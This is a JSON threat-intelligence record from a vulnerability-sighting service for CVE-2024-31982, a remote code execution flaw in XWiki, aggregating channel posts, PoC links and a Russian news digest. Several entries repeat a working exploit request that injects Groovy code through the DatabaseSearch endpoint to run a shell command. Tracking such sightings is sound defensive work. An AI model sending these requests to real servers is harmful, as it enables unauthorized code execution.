{"vulnerability": "cve-2024-31982", "sightings": [{"uuid": "ffc0dab4-9770-4fd2-828b-86bff8157df7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3m3ioph7g3v23", "content": "", "creation_timestamp": "2025-10-18T21:02:29.319593Z"}, {"uuid": "8f6598ef-dbfe-4fd2-8709-6fd0d5a6a682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "Telegram/lbg3qz8wK-Srr-k6BvW0hDYmtpTKwvGGzCPXHWNgNmGS9PQ", "content": "", "creation_timestamp": "2025-11-11T15:00:08.000000Z"}, {"uuid": "f8de3f48-4dd7-4db4-b784-1d3e5be8b527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7744", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-31982: XWiki Platform Remote Code Execution  &gt; 14.10.20\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-31982\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-22T21:25:43.000000Z"}, {"uuid": "8de82ced-de1d-46a8-a3bd-05f605cb49d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/Blackhat_Officials/1125", "content": "cve-2024-31982\n\nGET /bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nGET /xwiki//bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nid\n\n#exploit  #poc", "creation_timestamp": "2024-06-27T09:05:33.000000Z"}, {"uuid": "7c86246f-b35c-4166-b114-58cdfd8a4f19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "Telegram/H7AOcKgSxi-cXpwrNFvnEDUm1V5K6WYNvl9YhXS8yVdJiw", "content": "", "creation_timestamp": "2024-06-24T16:32:07.000000Z"}, {"uuid": "b2f2f269-be5f-450e-8196-aee8f535117b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1075", "content": "cve-2024-31982\n\nGET /bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nGET /xwiki//bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nid\n\n#exploit  #poc", "creation_timestamp": "2024-06-27T08:57:48.000000Z"}, {"uuid": "41ef6827-2dff-4776-b17a-fb7db67ba3ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2727", "content": "cve-2024-31982\n\nGET /bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nGET /xwiki//bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nid\n\n#exploit  #poc", "creation_timestamp": "2024-06-27T08:57:31.000000Z"}, {"uuid": "79bb8b12-861f-4309-93ba-109104a70354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10731", "content": "#exploit\n1. CVE-2024-31982:\nXWiki Platform RCE\nhttps://github.com/bigb0x/CVE-2024-31982\n\n2. CVE-2024-6267:\nSourceCodester Service Provider Management System - XSS\nhttps://github.com/sgr-xd/CVEs/blob/main/CVE-2024-6267.md\n\n3. CVE-2024-36680:\nSQLi in Promokit Facebook module for PrestaShop\nhttps://security.friendsofpresta.org/modules/2024/06/18/pkfacebook.html", "creation_timestamp": "2024-06-24T16:49:28.000000Z"}, {"uuid": "a3dbdfe2-b3ed-40da-8bfa-93c303d00398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/xwiki/cve202431982", "content": "", "creation_timestamp": "2024-07-09T12:10:30.000000Z"}, {"uuid": "90deb29a-9828-420a-b398-4a21d4947a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/10236", "content": "cve-2024-31982\n\nGET /bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nGET /xwiki//bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1\n\nid\n\n#exploit  #poc", "creation_timestamp": "2024-06-27T08:57:48.000000Z"}, {"uuid": "22531eb8-11b3-47a4-a21a-ac83cead2136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "Telegram/LQwu8ZEYXYnl8TjdVl8BmfpVcDxplgyG0O97Q2Pmf1SAl48", "content": "", "creation_timestamp": "2024-06-23T17:48:56.000000Z"}, {"uuid": "7065379a-321c-4d68-bb49-69622e7a7d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/11462", "content": "\u200aCVE-2024\u201331982: When a Simple Wiki Search Turns into a RCE Party\n\nhttps://infosecwriteups.com/cve-2024-31982-when-a-simple-wiki-search-turns-into-a-rce-party-abd9d34cf0e3?source=rss----7b722bfd1b8d---4", "creation_timestamp": "2024-08-29T09:08:04.000000Z"}, {"uuid": "c480fafb-1ca4-45a2-9b09-bb99ff10b0f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "seen", "source": "https://t.me/true_secator/6438", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b.\n\n\u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0440\u0430\u0441\u043a\u043b\u0430\u0434 \u0442\u0430\u043a\u043e\u0439:\n\n1. \u041a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 Shadowserver Foundation \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u044e\u0442 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u043c \u043d\u0430 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b\u0445 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 D-Link NAS \u0438 Citrix Virtual Apps and Desktops.\n\n2. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Palo Alto Networks \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e 0-day \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0432\u0448\u0438\u0445\u0441\u044f \u0441\u043b\u0443\u0445\u043e\u0432 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u043d\u0435\u044f\u0441\u043d\u043e, \u043a\u0430\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430, \u043a\u0442\u043e \u0435\u044e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0438 \u043a\u0442\u043e \u0441\u0442\u0430\u043b \u0446\u0435\u043b\u044c\u044e \u0430\u0442\u0430\u043a. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE, \u043d\u043e \u0435\u0435 \u0440\u0435\u0439\u0442\u0438\u043d\u0433 CVSS \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9,3. \u041f\u043e\u043a\u0430 \u0436\u0435 Palo Alto \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430\u0434 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0438 \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0434\u0435\u0442\u0435\u043a\u0446\u0438\u0438.\n\n3. \u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c \u0441 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u043e\u0439 \u043f\u043e \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043b\u0438\u0431\u043e \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e, \u043b\u0438\u0431\u043e \u0431\u0443\u0434\u0443\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u0435 \u0432\u0440\u0435\u043c\u044f.\n\n\u0412 \u0422\u041e\u041f\u0435 \u0437\u0430 \u043e\u043a\u0442\u044f\u0431\u0440\u044c: EoP \u0432 Windows Kernel Streaming (CVE-2024-30090), EoP \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 \u044f\u0434\u0440\u0430 Windows (CVE-2024-35250), \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0438 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f HTML-\u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Windows MSHTML (CVE-2024-43573), \u0430 \u0442\u0430\u043a\u0436\u0435 RCE \u0432 XWiki (CVE-2024-31982).\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u043d\u0435 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c CVE-2024-43629 \u0441 CVSS 7,8, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0443\u044e \u043a EoP, \u043a\u043e\u0442\u043e\u0440\u0443\u044e Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u043c PatchTuesday \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432 Positive Technologies.\n\n4. watchTowr Labs \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c EoP, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e Fortinet FortiManager FortiJump, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0443\u044e \u043f\u043e \u0438\u0442\u043e\u0433\u0443 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 FortiJump Higher.\n\n5. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Varonis \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0438 \u044f\u0437\u044b\u043a\u0430 Perl \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 PostgreSQL.\n\n\u041e\u043d\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-10979 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0430\u043a\u0442\u043e\u0440\u0430\u043c \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u044b.\n\nVaronis \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043d\u0430 \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u041e\u0421 \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043a \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n6. \u0411\u0430\u0437\u0430 KEV\u00a0CISA \u043f\u043e\u043f\u043e\u043b\u043d\u0438\u043b\u0430\u0441\u044c \u0441\u0435\u043c\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0434\u0432\u0430 \u043d\u0443\u043b\u044f \u0432 Windows \u0438\u0437 \u043f\u0430\u0442\u0447\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0438, \u0434\u0432\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 PAN \u0438 Metabase GeoJSON, Cisco ASA \u0438 Atlassian Jira.\n\n\u0410 \u0432 NIST \u0441\u043c\u043e\u0433\u043b\u0438 \u043b\u0438\u0448\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c NVD, \u0432\u043a\u043b\u044e\u0447\u0438\u0432 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431\u043e \u0432\u0441\u0435\u0445 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0437\u0430 \u044d\u0442\u043e\u0442 \u0433\u043e\u0434, \u043d\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044f \u043f\u0440\u043e\u0431\u0443\u043a\u0441\u043e\u0432\u044b\u0432\u0430\u0442\u044c \u0441 \u043e\u0433\u0440\u043e\u043c\u043d\u044b\u043c \u0431\u044d\u043a\u043b\u043e\u0433\u043e\u043c CVE, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041c\u0430\u0439\u0441\u043a\u0438\u0435 \u043e\u0431\u0435\u0449\u0430\u043d\u0438\u044f \u0432\u0441\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043a \u043a\u043e\u043d\u0446\u0443 \u0433\u043e\u0434\u0430 \u0432\u0440\u044f\u0434 \u043b\u0438 \u0431\u0443\u0434\u0443\u0442 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u044b.\n\n7. Defiant \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e CVE-2024-10924 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS 9,8) \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 Really Simple Security \u0434\u043b\u044f WordPress, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0443\u0442\u044c 4 \u043c\u043b\u043d. \u0441\u0430\u0439\u0442\u043e\u0432 \u0440\u0438\u0441\u043a\u0443 \u043f\u043e\u043b\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0432 2FA.", "creation_timestamp": "2024-11-15T18:00:06.000000Z"}, {"uuid": "f48f38dd-e296-48de-b115-d2e5acfc7745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2703", "content": "https://github.com/bigb0x/CVE-2024-31982\n\nCVE-2024-31982 PoC and Bulk Scanner\n#github  #poc", "creation_timestamp": "2024-06-23T17:48:29.000000Z"}, {"uuid": "604bd75a-f39e-4d35-a723-4dbbd4cf2ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/655", "content": "#exploit\n1. CVE-2024-31982:\nXWiki Platform RCE\nhttps://github.com/bigb0x/CVE-2024-31982\n\n2. CVE-2024-6267:\nSourceCodester Service Provider Management System - XSS\nhttps://github.com/sgr-xd/CVEs/blob/main/CVE-2024-6267.md", "creation_timestamp": "2024-06-24T06:03:31.000000Z"}, {"uuid": "6e790aaf-4730-4424-bc8a-5c8b08690835", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-31982", "type": "published-proof-of-concept", "source": "Telegram/qpTt8hn-MNTW9GRNUGUj-EvhwsJUEwILc4glxmi3TsHm5A", "content": "", "creation_timestamp": "2024-06-27T08:58:04.000000Z"}]}